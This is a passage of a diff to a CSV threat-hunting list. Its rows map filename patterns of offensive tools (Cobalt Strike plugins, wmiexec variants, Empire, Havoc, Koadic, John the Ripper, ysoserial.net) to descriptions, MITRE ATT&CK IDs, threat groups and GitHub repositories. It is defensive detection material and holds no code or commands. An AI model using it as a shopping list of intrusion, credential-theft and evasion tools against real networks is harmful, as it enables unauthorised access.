T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Winsocky.git*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*/wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool 
that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/wiresocks.git*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*/wmeye/*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*/WMI Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*/wmi.dropper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/WMI/wmi.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/wmiexec/*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*/WMI/wmi.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/wmiexec/*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*/wmiexec2.git*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*/wmiexec-Pro*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*/wmisploit*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*/word_list.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/word_list.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/word_list.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*/word_list.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/wordlists/owa_directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/wordlists/skype-directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*/workflow/test/dirbscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/workflow/test/dirbscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" "*/wpaf/finder.py*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*/wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/WSPCoerce.git*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*/ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/WSPCoerce.git*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - 
TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*/wwlib/lolbins/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*/www/exploit.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*/x0rz/*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x0rz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE 
Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/x64_slim.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*/x64_slim.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xan7r/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" 
-"*/xar-1.5.2.tar.gz*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/xar-1.5.2.tar.gz*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xen-mimi.ps1*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/xml_attack.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" 
@@ -5861,14 +5930,15 @@
 "*/xPipe/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z"
 "*/xss_robertux.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","",""
 "*/xxe_fuzz.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","",""
-"*/yanghaoi/_CNA*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
-"*/ysoserial/*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
+"*/yanghaoi/_CNA*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 